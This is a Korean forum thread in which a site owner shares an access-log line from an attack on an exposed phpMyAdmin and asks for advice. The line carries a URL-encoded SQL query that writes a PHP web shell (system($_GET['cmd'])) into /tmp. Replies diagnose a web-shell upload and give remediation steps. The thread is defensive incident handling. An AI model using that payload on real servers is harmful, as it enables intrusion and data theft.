112.219.92.82 - - [24/Mar/2012:01:01:42 +0900] "GET /phpmyadmin/main.php?reload=1&sql_query=select+%27%3C%3Fphp+echo+%5C%27%3Cpre%3E%5C%27%3Bsystem%28%24_GET%5B%5C%27cmd%5C%27%5D%29%3B+echo+%5C%27%3C%2Fpre%3E%5C%27%3B+%3F%3E%27+INTO+OUTFILE+%27%2Ftmp%2F.a%27&token=6447c5d6e0ef4ea9a5807a9cdf775021 HTTP/1.1" 200 7428 "도메인/util/phpmyadmin/server_sql.php?token=6447c5d6e0ef4ea9a5807a9cdf775021" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.26) Gecko/20120128 Firefox/3.6.26"
위와같이 웹로그가 다수 발견되었는데요
phpmyadmin 소스 파일을 웹에서 다운받을수 있게 리스트 보이게 해둿엇는데 그경로 뒤에 이런식으로 쿼리를 남겼네요.. 굵게 표시해놓은 .a 파일이 /tmp 디렉토리에서 발견되었구요..
인젝션이나 그런형태 인건가요?
아이피 변조해서 무수히 많은 로그가 생성되었습니다 ㅠㅠ
zh-CN이건 중국이라는거같기도 하고 ㅠㅠ 조언바랍니다 ㅠㅠ 일단 그경로의 파일은 삭제햇습니다 ㅠㅠ
댓글 3개
13년 전
음....정확한건 들어가서 봐야겠지만......phpmyadmin 기본 로그가 저런식으로 남다보니...
별다른 의심점은 /tmp 에 파일이 생겼다라는건데....폴더명을 phpmysadmin 이런식으로 쓰는건
위험하구요...조치는 잘 취하신것 처럼보이네욤...
파일 삭제와 더불어 경로변경 , phpmyadmin 버전업 정도 조치 하시면 될듯 한데욤
별다른 의심점은 /tmp 에 파일이 생겼다라는건데....폴더명을 phpmysadmin 이런식으로 쓰는건
위험하구요...조치는 잘 취하신것 처럼보이네욤...
파일 삭제와 더불어 경로변경 , phpmyadmin 버전업 정도 조치 하시면 될듯 한데욤
xkingcode
13년 전
웹셀 업로드 맞네요. PHP로 보내는 명령을 바로 실행하는 PHP 파일을 만든겁니다.
일단 서버내에 파일은 다 털어갈 수 있는 상황이 되었고요.
(소스, db접속 계정 정보, DB 내용)
우선 기본적으로 비밀번호 변경하시고요.
가능한 업데이트 다 해주시고요.
웹셀 이후에 권한 탈취 시도까지는 없었던 것 같습니다만
좀비 PC 가능성도 높으니
ps aux 에서 이상한 프로세스 있으면 삭제해주세요
neststat -a 해서 정체모를 IP로부터 명령 받고있는건 없는지 확인하시고요.
phpmyadmin 경로 변경해서 다른 곳에서 쓰시고
phpmyadmin 최신 버전으로 다시 받으시고요.
MySQL은 해당 서버에서만 접근할 수 있게 IP제한 걸어주시고
PHPMyadmin도 IP 제한 걸면 좋고요.
가능하면 방화벽으로 오픈해야 하는 서비스만 오픈하심이 좋아보이십니다.
일단 서버내에 파일은 다 털어갈 수 있는 상황이 되었고요.
(소스, db접속 계정 정보, DB 내용)
우선 기본적으로 비밀번호 변경하시고요.
가능한 업데이트 다 해주시고요.
웹셀 이후에 권한 탈취 시도까지는 없었던 것 같습니다만
좀비 PC 가능성도 높으니
ps aux 에서 이상한 프로세스 있으면 삭제해주세요
neststat -a 해서 정체모를 IP로부터 명령 받고있는건 없는지 확인하시고요.
phpmyadmin 경로 변경해서 다른 곳에서 쓰시고
phpmyadmin 최신 버전으로 다시 받으시고요.
MySQL은 해당 서버에서만 접근할 수 있게 IP제한 걸어주시고
PHPMyadmin도 IP 제한 걸면 좋고요.
가능하면 방화벽으로 오픈해야 하는 서비스만 오픈하심이 좋아보이십니다.
13년 전
phpmyadmin 최신 버전으로 사용하는게 좋겠네요.
phpmyadmin 트래픽 공격도 발생하더군요.
phpmyadmin 트래픽 공격도 발생하더군요.
게시판 목록
프로그램
| 번호 | 제목 | 글쓴이 | 날짜 | 조회 |
|---|---|---|---|---|
| 5130 | 13년 전 | 750 | ||
| 5129 | 13년 전 | 1759 | ||
| 5128 | 13년 전 | 926 | ||
| 5127 | 13년 전 | 504 | ||
| 5126 | 13년 전 | 743 | ||
| 5125 | 13년 전 | 1346 | ||
| 5124 | 13년 전 | 817 | ||
| 5123 | 13년 전 | 452 | ||
| 5122 | 13년 전 | 991 | ||
| 5121 |
|
13년 전 | 1379 | |
| 5120 | 13년 전 | 496 | ||
| 5119 | 13년 전 | 472 | ||
| 5118 | 13년 전 | 400 | ||
| 5117 | 13년 전 | 714 | ||
| 5116 | 13년 전 | 448 | ||
| 5115 | 13년 전 | 904 | ||
| 5114 | 13년 전 | 937 | ||
| 5113 |
cookieyou
|
13년 전 | 1345 | |
| 5112 | 13년 전 | 528 | ||
| 5111 | 13년 전 | 817 | ||
| 5110 | 13년 전 | 4440 | ||
| 5109 | 13년 전 | 1061 | ||
| 5108 | 13년 전 | 402 | ||
| 5107 | 13년 전 | 474 | ||
| 5106 | 13년 전 | 630 | ||
| 5105 | 13년 전 | 1096 | ||
| 5104 | 13년 전 | 411 | ||
| 5103 |
프로프리랜서
|
13년 전 | 1339 | |
| 5102 | 13년 전 | 1582 | ||
| 5101 | 13년 전 | 456 | ||
| 5100 | 13년 전 | 367 | ||
| 5099 | 13년 전 | 518 | ||
| 5098 | 13년 전 | 2127 | ||
| 5097 | 13년 전 | 374 | ||
| 5096 | 13년 전 | 519 | ||
| 5095 | 13년 전 | 383 | ||
| 5094 | 13년 전 | 388 | ||
| 5093 | 13년 전 | 871 | ||
| 5092 | 13년 전 | 1052 | ||
| 5091 | 13년 전 | 402 | ||
| 5090 | 13년 전 | 505 | ||
| 5089 | 13년 전 | 949 | ||
| 5088 | 13년 전 | 401 | ||
| 5087 | 13년 전 | 1152 | ||
| 5086 | 13년 전 | 1477 | ||
| 5085 |
|
13년 전 | 3921 | |
| 5084 |
alexseo
|
13년 전 | 906 | |
| 5083 | 13년 전 | 1121 | ||
| 5082 | 13년 전 | 597 | ||
| 5081 | 13년 전 | 519 | ||
| 5080 | 13년 전 | 592 | ||
| 5079 | 13년 전 | 961 | ||
| 5078 | 13년 전 | 2175 | ||
| 5077 | 13년 전 | 662 | ||
| 5076 |
몰보는거야
|
13년 전 | 1685 | |
| 5075 |
|
13년 전 | 1764 | |
| 5074 | 13년 전 | 2005 | ||
| 5073 |
|
13년 전 | 763 | |
| 5072 |
프로프리랜서
|
13년 전 | 1033 | |
| 5071 |
프로프리랜서
|
13년 전 | 760 | |
| 5070 |
프로프리랜서
|
13년 전 | 871 | |
| 5069 |
뭐먹고살지ㅠ
|
13년 전 | 781 | |
| 5068 |
danielle
|
13년 전 | 642 | |
| 5067 | 13년 전 | 758 | ||
| 5066 | 13년 전 | 833 | ||
| 5065 | 13년 전 | 902 | ||
| 5064 | 13년 전 | 1715 | ||
| 5063 | 13년 전 | 429 | ||
| 5062 | 13년 전 | 801 | ||
| 5061 | 13년 전 | 575 | ||
| 5060 | 13년 전 | 379 | ||
| 5059 |
senseme
|
13년 전 | 834 | |
| 5058 | 13년 전 | 2842 | ||
| 5057 | 13년 전 | 1908 | ||
| 5056 | 13년 전 | 1479 | ||
| 5055 | 13년 전 | 437 | ||
| 5054 |
senseme
|
13년 전 | 1059 | |
| 5053 |
senseme
|
13년 전 | 1903 | |
| 5052 |
senseme
|
13년 전 | 1035 | |
| 5051 |
senseme
|
13년 전 | 1057 | |
| 5050 |
senseme
|
13년 전 | 796 | |
| 5049 |
senseme
|
13년 전 | 973 | |
| 5048 | 13년 전 | 1981 | ||
| 5047 | 13년 전 | 487 | ||
| 5046 |
우렁찬우렁이
|
13년 전 | 852 | |
| 5045 |
크라이스트
|
13년 전 | 2145 | |
| 5044 | 13년 전 | 958 | ||
| 5043 | 13년 전 | 521 | ||
| 5042 | 13년 전 | 963 | ||
| 5041 |
|
13년 전 | 803 | |
| 5040 |
스마일라니
|
13년 전 | 865 | |
| 5039 | 13년 전 | 1128 | ||
| 5038 | 13년 전 | 1918 | ||
| 5037 | 13년 전 | 1041 | ||
| 5036 |
cookieyou
|
13년 전 | 1397 | |
| 5035 | 13년 전 | 491 | ||
| 5034 | 13년 전 | 553 | ||
| 5033 | 13년 전 | 483 | ||
| 5032 | 13년 전 | 430 | ||
| 5031 | 13년 전 | 727 |
댓글 작성
댓글을 작성하시려면 로그인이 필요합니다.
로그인하기